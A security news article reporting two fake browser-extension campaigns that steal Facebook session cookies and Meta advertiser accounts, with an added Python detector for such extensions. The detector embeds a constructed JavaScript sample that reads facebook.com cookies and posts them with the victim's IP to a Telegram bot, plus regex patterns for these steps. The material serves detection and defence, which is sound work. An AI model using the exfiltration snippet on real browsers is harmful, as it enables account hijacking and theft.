Cybersecurity researchers have uncovered two separate campaigns distributing fake browser extensions through malicious ads and counterfeit websites, aimed at stealing session cookies and account data from Facebook users and Meta advertisers. The campaigns employ extensions that masquerade as legitimate tools, including fake “Meta Verified” add-ons and AI-powered ad optimization utilities.
“The malicious ads are bundled with a video tutorial that guides viewers through the process of downloading and installing a so-called browser extension, which claims to unlock the blue verification tick on Facebook or other special features,” Bitdefender explained. In reality, the SocialMetrics Pro extension, hosted on the cloud service Box, collects Facebook session cookies and sends them to a Telegram bot controlled by attackers. It can also retrieve the victim’s IP address through ipinfo[.]io/json. Select variants of the extension have been observed using stolen cookies to interact with the Facebook Graph API, likely to gather additional account information for resale or further malicious campaigns.
Bitdefender noted that the campaigns exhibit characteristics linked to Vietnamese-speaking threat actors, including Vietnamese-language tutorials and source code comments. “By using a trusted platform, attackers can mass-generate links, automatically embed them into tutorials, and continuously refresh their campaigns,” the company said. “This fits a larger pattern of attackers industrializing malvertising, where everything from ad images to tutorials is created en masse.”
A separate campaign targets Meta advertisers using fake Chrome extensions distributed via counterfeit websites promoting AI-powered ad optimization tools, including Madgicx Plus, Meta Ads SuperTool, and Madgicx X Ads. “Promoted as a tool to streamline campaign management and boost ROI using artificial intelligence, the extension instead delivers potentially malicious functionalities capable of hijacking business sessions, stealing credentials, and compromising Meta Business accounts,” Cybereason reported.
Once installed, these extensions gain full access to all websites visited by the user, allowing attackers to inject scripts, intercept traffic, monitor activity, and harvest credentials. They also prompt users to link their Facebook and Google accounts, while covertly capturing identity information. Similar to the Meta Verified extensions, the add-ons use stolen Facebook credentials to interact with the Facebook Graph API. “This staged approach reveals a clear threat-actor strategy: first capturing Google identity data, then pivoting to Facebook to broaden access and increase the chances of hijacking valuable business or advertising assets,” Cybereason said.
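As an added example, not code from Bitdefender, Cybereason or the extensions they describe, the Python script below triages an unpacked extension for the indicators reported above: broad host access plus the `cookies` permission in the manifest, and cookie reads, an `ipinfo.io/json` lookup, Telegram bot exfiltration and Graph API calls in the background script. The sample manifest, the sample script, the rule names and the verdict threshold are all constructed for this example; they mimic the reported behaviour rather than reproducing any real extension's code.

```python
"""Static triage of an unpacked browser extension for cookie-theft indicators.

Added example for this article; not code from Bitdefender, Cybereason or the
extensions they analysed. The manifest, script and rules below are constructed
to mimic the reported behaviour (broad host access, cookie reads, ipinfo lookup,
Telegram bot exfiltration, Graph API calls), not copied from a real sample.
"""
import json
import re

# Constructed sample manifest: broad host access plus the cookies permission.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Ads Optimizer Pro",  # fictional name, not one of the reported extensions
    "version": "1.0",
    "permissions": ["cookies", "storage", "tabs", "scripting"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
})

# Constructed sample background script mimicking the reported chain:
# read Facebook session cookies, look up the victim's IP, post to a Telegram bot,
# then query the Graph API with the stolen session.
SAMPLE_SCRIPT = r"""
chrome.cookies.getAll({domain: ".facebook.com"}, async (cookies) => {
  const ip = await (await fetch("https://ipinfo.io/json")).json();
  const body = JSON.stringify({cookies, ip});
  await fetch("https://api.telegram.org/bot" + TOKEN + "/sendMessage?chat_id=" + CHAT,
              {method: "POST", body});
  await fetch("https://graph.facebook.com/v19.0/me/adaccounts?access_token=" + tok);
});
"""

# Host patterns that grant access to every site the user visits (MV2 or MV3 spelling).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Script indicators; rule names are this example's own, not a vendor taxonomy.
SCRIPT_RULES = {
    "reads_cookies": re.compile(r"chrome\.cookies\.(getAll|get)\b"),
    "facebook_domain": re.compile(r"\.facebook\.com"),
    "ipinfo_lookup": re.compile(r"ipinfo\.io/json"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    "graph_api_call": re.compile(r"graph\.facebook\.com/"),
}


def manifest_findings(manifest_text):
    """Return risky declarations from a manifest (handles MV2 and MV3 layouts)."""
    m = json.loads(manifest_text)
    perms = set(m.get("permissions", []))
    # MV3 lists hosts under host_permissions; MV2 mixes them into permissions.
    hosts = set(m.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    findings = []
    if hosts & BROAD_HOSTS:
        findings.append("broad_host_access")
    if "cookies" in perms:
        findings.append("cookies_permission")
    return findings


def script_findings(script_text):
    """Return the name of every script rule that matches, in rule order."""
    return [name for name, rx in SCRIPT_RULES.items() if rx.search(script_text)]


def triage(manifest_text, script_text):
    """Combine manifest and script findings into a verdict.

    'cookie_exfiltration' requires the ability to read cookies (permission plus an
    actual cookies API call) AND an exfiltration channel. The threshold is this
    example's choice, not a rule from the reports.
    """
    findings = manifest_findings(manifest_text) + script_findings(script_text)
    can_read = "cookies_permission" in findings and "reads_cookies" in findings
    exfil = "telegram_bot_api" in findings
    if can_read and exfil:
        verdict = "cookie_exfiltration"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, findings


if __name__ == "__main__":
    verdict, findings = triage(SAMPLE_MANIFEST, SAMPLE_SCRIPT)
    print(verdict, findings)
```

In practice you would point `manifest_findings` and `script_findings` at the files of an unpacked extension directory (or one pulled from a CRX) and treat any `cookie_exfiltration` verdict as grounds to revoke the affected Facebook sessions, since the cookies, not just the password, are what the attackers replay against the Graph API.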
These campaigns highlight the increasing sophistication of malvertising and browser extension-based attacks targeting social media and advertising platforms. Users and organizations should scrutinize the permissions an extension requests before installing it, in particular broad host access combined with cookie access, and treat ad-promoted “verification” or ad-optimization tools with suspicion.